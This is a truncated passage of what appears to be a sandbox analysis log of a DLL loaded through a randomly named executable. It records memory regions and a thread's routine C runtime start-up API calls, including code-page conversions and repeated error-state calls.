0x83ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 316 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 5 os_tid = 0xa54 [0030.261] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fad4 | out: lpSystemTimeAsFileTime=0x26fad4*(dwLowDateTime=0xdff5f650, dwHighDateTime=0x1d3dfba)) [0030.261] GetCurrentProcessId () returned 0xa50 [0030.261] GetCurrentThreadId () returned 0xa54 [0030.261] GetTickCount () returned 0x16d14 [0030.261] QueryPerformanceCounter (in: lpPerformanceCount=0x26facc | out: lpPerformanceCount=0x26facc*=356162405) returned 1 [0030.263] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.263] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0030.263] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0030.263] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0030.263] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0030.279] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.279] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.280] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.281] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.281] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.281] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.282] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.282] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.282] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.282] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.282] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.282] GetCurrentThreadId () returned 0xa54 [0030.282] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS" [0030.282] GetEnvironmentStringsW () returned 0x357878* [0030.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0030.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x8309f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0030.283] FreeEnvironmentStringsW (penv=0x357878) returned 1 [0030.283] GetStartupInfoA (in: lpStartupInfo=0x26fa24 | out: lpStartupInfo=0x26fa24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0030.283] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0030.283] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0030.283] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0030.283] SetHandleCount (uNumber=0x20) returned 0x20 [0030.283] GetLastError () returned 0x0 [0030.283] SetLastError (dwErrCode=0x0) [0030.284] GetLastError () returned 0x0 [0030.284] SetLastError (dwErrCode=0x0) [0030.284] GetLastError () returned 0x0 [0030.284] SetLastError (dwErrCode=0x0) [0030.284] GetACP () returned 0x4e4 [0030.284] GetLastError () returned 0x0 [0030.284] SetLastError (dwErrCode=0x0) [0030.284] IsValidCodePage (CodePage=0x4e4) returned 1 [0030.284] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26fa04 | out: lpCPInfo=0x26fa04) returned 1 [0030.284] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f4d0 | out: lpCPInfo=0x26f4d0) returned 1 [0030.284] GetLastError () returned 0x0 [0030.284] SetLastError (dwErrCode=0x0) [0030.284] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26f460 | out: lpCharType=0x26f460) returned 1 [0030.284] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f8e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.284] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f8e4, cbMultiByte=256, lpWideCharStr=0x26f248, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.285] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x26f4e4 | out: lpCharType=0x26f4e4) returned 1 [0030.285] GetLastError () returned 0x0 [0030.285] SetLastError (dwErrCode=0x0) [0030.285] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0030.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f8e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f8e4, cbMultiByte=256, lpWideCharStr=0x26f218, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쯮쬛矲狰Ā") returned 256 [0030.285] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쯮쬛矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0030.285] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쯮쬛矲狰Ā", cchSrc=256, lpDestStr=0x26f008, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f7e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ÷^.Ê\x1cú&", lpUsedDefaultChar=0x0) returned 256 [0030.285] GetLastError () returned 0x0 [0030.285] SetLastError (dwErrCode=0x0) [0030.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f8e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f8e4, cbMultiByte=256, lpWideCharStr=0x26f238, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쯮쬛矲狰Ā") returned 256 [0030.285] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쯮쬛矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0030.285] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쯮쬛矲狰Ā", cchSrc=256, lpDestStr=0x26f028, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0030.285] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f6e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ÷^.Ê\x1cú&", lpUsedDefaultChar=0x0) returned 256 [0030.285] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.286] SetLastError (dwErrCode=0x0) [0030.286] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.287] SetLastError (dwErrCode=0x0) [0030.287] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.288] SetLastError (dwErrCode=0x0) [0030.288] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.289] SetLastError (dwErrCode=0x0) [0030.289] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.290] GetLastError () returned 0x0 [0030.290] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.291] SetLastError (dwErrCode=0x0) [0030.291] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError (dwErrCode=0x0) [0030.292] GetLastError () returned 0x0 [0030.292] SetLastError 